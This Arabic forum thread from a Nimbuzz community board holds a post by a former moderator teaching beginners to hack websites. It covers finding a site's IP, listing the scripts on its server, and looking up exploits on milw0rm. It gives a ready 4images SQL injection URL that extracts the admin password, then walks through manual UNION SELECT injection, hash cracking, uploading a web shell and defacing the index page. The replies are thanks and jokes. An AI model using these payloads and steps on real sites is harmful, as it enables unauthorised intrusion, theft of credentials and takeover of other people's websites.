المنتدى العربي الاقوى في عالم النمبز بادارة : صهيب الاردن (نمبز،نمبوز،نيمباز،نيمبز،klf.،برامج نمبز،فلود،غرف،رومات،دردشه،اصدارات،خدع،برامج،جاجيم،جابيم،بانديون،رد الي،تخمين)
 
الرئيسيةالرئيسية  مركز رفع الصور  س .و .جس .و .ج  بحـثبحـث  البوابةالبوابة  التسجيلالتسجيل  دخولدخول  
مرحبا زائر ، يتوفر نكات عربية للبيع لدى صهيب الاردن ارسل واتس أب للرقم 00962796231801

شاطر | 
 

 انتا هكر nimbuzzطيب يباشا تعا احكيلك هل سر

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
ahmed gharaibeh
مشرف سابق
مشرف سابق


الجنس : ذكر
عدد المساهمات : 232
التـقـيـيـم : 16
انــا مــن : jordan
عـمـري: : 30
تاريخ التسجيل : 27/08/2011

مُساهمةموضوع: انتا هكر nimbuzzطيب يباشا تعا احكيلك هل سر   30/8/2011, 8:36 pm

اليوم حبيت اشرح للشباب كيفية اكتشاف واستغلال ثغرات الsql

بسم الله الرحمن الرحيم

نحن تعودنا انو لما نستهدف منتدى او موقع يبقى نطلع الايبي تبعو ولاتقولي كيف نطلوه ؟؟

مافي مشكل الايبي نطلعوه بالشكل التالي نفتح الدوس

starبعدين نرووح ل run بعدين نكتب cmdبعدين تطلع شاشة الدوس نكتب
ping site.com

site.com طبعا هي الموقع المستهدف

وبعدين لما نطلع الايبي بنروووح نتابع الاستهداف ونبحث عن ثغرات للسكريبتات يلي

مركبها السيرفر اللي عليه الموقع او المنتدى المستهدف ولا تقول لي كيف نبحث عن
الثغرات ؟؟

مافي مشكل للبحث عن ثغرات السكريبتات نرووح اولا نطلع السكريبتات يلي مركبها السيرفر اللي عليه الموقع او المنتدى المستهدف بالطريقة التالية :

نرووح لموقعwww.msn.com

بعدين بمربع البحث نكتب كما يلي :


ip:125.20.04.13 powered

وطبعا نغير الاي بي الاي يلي استخرجناه قبل قليل

وبعدين تطلع سكريبتات كثييرة كمثال powered by 4images

4images هو نوع من انواع السكريبتات

ونجي لخطوة البحث عن ثغرات للسكريبت ودائما كمثال نأخد السكريبت 4images

ندهب الى موقع من مواقع السيكيرتي وكمثال نأخد الميليريوم http://www.milw0rm.com/search.php

نكتب في خانة البحث اسم السكريبت يلي راح نشوف له ثغرت وحنا اخدنا 4images

نكتب اسمو ونظغط بحث

بعدين بيطلع لك ثغرات استغلالاتها مختلفة وان شاء الله نتطرق لكافة الاستغلالات

كمثال استغلال ثغرة 4images يكون زي كده

search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527ADMIN

نكتب هالاستغلال خلف اسم السكريبت يعني زي كده

http://www.site.com/4images/search.p...ame=%2527ADMIN

وطبعا كلمة ADMIN نغيرها حسب اسم المدير

وبعدين راح يطلع لنا الباسوورد مشفر عادي نرووح نفكو ببرامج فك التشفير او مواقع فك التشفير كمثال نأخد http://www.milw0rm.com/cracker/

نحط الباسوورد المشفر وننتظر لحتى يفكو ولما يفكو ندخل اسم المدير والباسوورد ونضيف امتداد php من لوحة تحكم 4images

وبعدين نرفع شل عادي وكأننا نرفع في صورة

طيب لو ما لاقينا سكريبتات فيها ثغرات على السيرفر في هده الحالة نضطر الى اكتشاف الثغرات بنفسنا وفي هدا الدرس هوشرح لطريقة اكتشاف واستغلال ثغرات sql ولكننا انحرفنا عن درسنا قليلا ...... ما يهم

طريقة اكتشاف واستغلال ثغرات sql-injection

وهي ثغره مصابه بيها ما يقارب 60% من المواقع

وتسمى ثغره الحقن


اوكي كيف اعرفها او استغلها

طيب كيف نستخرج المواقع يلي فيها هده الثغرات

نستخرجها بالشكل التالي :

ندهب لwww.msn.com وبمربع البحث نكتب بالشكل التالي

ip:125.20.04.13 . warning
او
ip:125.20.04.13 . home
او
ip:125.20.04.13 . puplic_html
طبعا نغير الاي بي الى ايبي الي استخرجناه بالاول

خلي نفرض انك لقيت موقع على السيرفر الي تريده فيه اخطاء

والاخطاء تجي غالبا بالشكل التالي كمثال www.site.com/index.php?ver=21
نروح وندور على متغير اوكي والمتغير هو دالي ياتي بعدها علامه =
مثل www.site.com/index.php?ver=21

شفتو هذا متغير var=21


زين احنا وجدنا متغير كيف ابحث عن ثغرات اني اقولك
نضيف علامه " بعد المتغير ونشوف اذا ظهر لي في الصفحه خطأ
يعني كيف انا اقولك هكذا
www.seit.com/index.php?ver=21"

اشلون اعرف ظهر لي خطأ

يظهر في الصفحه هكذا

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

او في بعض الاحيان يضهر هكذا
You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the
right syntax to use near ''' at line 1

اوكي احنا وجدنا خطا كيف اخترق الموقع
واي لازم نعرف عدد الاعمده المصابه
زين اشلون اني اقولك
نجي على الموقع
نضيف علامه - السالب قبل الرقم
www.seit.com/index.php?ver=-21

اوكي بعدها نكتب الامر
+union+select+

www.seit.com/index.php?ver=-21+union+select+


واحد ذكي يقلي ليش كتبنا هذا الكلام ؟؟ اقلك هذا امر اتصال بالقاعده اوكي نكمل

نشوف عدد الاعمده المصابه اوكي نكمل بعد علامه + نكتب
1,2,3,4,5,6,7,8,9,10

http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7

اوككي نبدي من رقم واحد ونزيد يعني نضيف عامود واحد ونضغط انتر نشوف هل ذهب الخطا
وبعدين رقم اثنين وهكذا نزيد في عدد الاعمده حتي يذهب الخطا

خلي نفرض انا وصلنا العمود السابع وذهب الخطا
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7

يعني الخطا يلي شفناه اول مافتحنا الموقع يختفي ^^

نلا حض في مكان الخطا ضهرلنا رقم خلي نفرض ضهر لنا رقم 2

اوكي هذا هو المهم يعني في الاسغلال الي هو هذا
http://www.seit.com/index.php?ver=-2...+1,2,3,4,5,6,7
راح نضع اوامرنا مكان الرقم 2

اوكي حبايب طبعا احنا مهمتنا ندور على اسم الادمن والباسورد طيب كيف
اني اقلك تضع مكان الرقم 2 التالي

username( )

مثل

www.seit.com/index.php?ver=-21+union+select+1, username( ),3,4,5,6,7

راح تشوف مكان الرقم 2 الي ضهر في الصفحه يضهر لي اسم انشاء الله هو اسم الادمن
كذالك الباسورد نفس الطريقه بدل username( )

نحط password( )

وبعدين يطلع لنا الباسوورد مشفر ويبقى نفك تشفييييره ونخترق الموقع ونرفع شل من لوحة التحكم

طبعا الموضوع مكتوووب بالحرف بالحرف يعني ظروري راح تكون هنالك اخطاء املائية

وفي الاخير حبيت اقول ان

هدا الدرس هو اتمام للدروووس التي بدأتها من قبل وهو الدرس السادس اكتشاف ثغرات الsql
والدرس كان مشرروح بالفيديو وبطريقة جيدة ولكن حدف عن طريق الخطا ^^مو مشكل ان شاء الله لما بيكون وقت اعيد شرحو بالفيديو

بعرف انو الدرس صعيييييييب نوع ما او غير مفهوم لكن والله الوقت الكافي ماعندي وراح اعيد درووس بالفيديو ونفس هدا الدرس ان شاء الله راح اشرحو بالفيديو وكدالك راح نتطرق لاكتشاف واستغلال انواع الثغرات

وان شاء الله نبدأ بالدروووس الجديدة هده الأيام من بداية الاستهداف حتى تعليق الأندكس

اتمنى اكون وفيت وكفيت طبعا ما حبيت اتعمق اكثر في الدرس لأنو ماراح يساعد المبتدئين






For more info

[center]-
-
-
-
Mhajr22@yahoo.com
ahmed_gharaibeh00@hotmail.com

[twitter name]
ahmedgharaibeh

skypa name:
ahmed-gharaibeh

(___asd___m_2_o_t_a___)@nimbuzz.com


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
ahmed gharaibeh
مشرف سابق
مشرف سابق


الجنس : ذكر
عدد المساهمات : 232
التـقـيـيـم : 16
انــا مــن : jordan
عـمـري: : 30
تاريخ التسجيل : 27/08/2011

مُساهمةموضوع: رد: انتا هكر nimbuzzطيب يباشا تعا احكيلك هل سر   30/8/2011, 8:37 pm

:lol!: :lol!: :lol!: :D






For more info

[center]-
-
-
-
Mhajr22@yahoo.com
ahmed_gharaibeh00@hotmail.com

[twitter name]
ahmedgharaibeh

skypa name:
ahmed-gharaibeh

(___asd___m_2_o_t_a___)@nimbuzz.com


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
????
زائر



مُساهمةموضوع: رد: انتا هكر nimbuzzطيب يباشا تعا احكيلك هل سر   1/9/2011, 11:15 am

ليش لضيع 13 ساعه بالدراسه ؟! ؟!
هههههههههههههههههههه
مشكووور صهيب
الرجوع الى أعلى الصفحة اذهب الى الأسفل
JORDANBUZZ
المشرفين
المشرفين


عدد المساهمات : 350
التـقـيـيـم : 0
تاريخ التسجيل : 16/11/2011

مُساهمةموضوع: رد: انتا هكر nimbuzzطيب يباشا تعا احكيلك هل سر   1/12/2011, 8:39 pm

انا ما قدرت اخلص القرائة لانني تعبت كثير lol! lol! lol! lol!
بس مشكور علي المساهمة
ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

بالتوفيق



نحن نميل إلى تصديق أولئك الذين لا نعرفهم لأنهم لم يخدعونا من قبل

ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ


منتديات نيمبز فاميلي الاردني العربي





للاستفسار او المواصلة يرجي مراجعة ايميلي


ahmed--sa@nimbuzz.com






www.jordanbuzz.tk.
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
انتا هكر nimbuzzطيب يباشا تعا احكيلك هل سر
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» بـــــــــــرنامج ضد الفـــــــــــلود من فـــــــــــيروس الحب

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات نمبز فاميلي العربيه الاردنية JordaN-BuzZ ™ :: قسم النمبز- Nimbuzz :: قسم النمبز :: قسم برامج الكمبيوتر-
انتقل الى: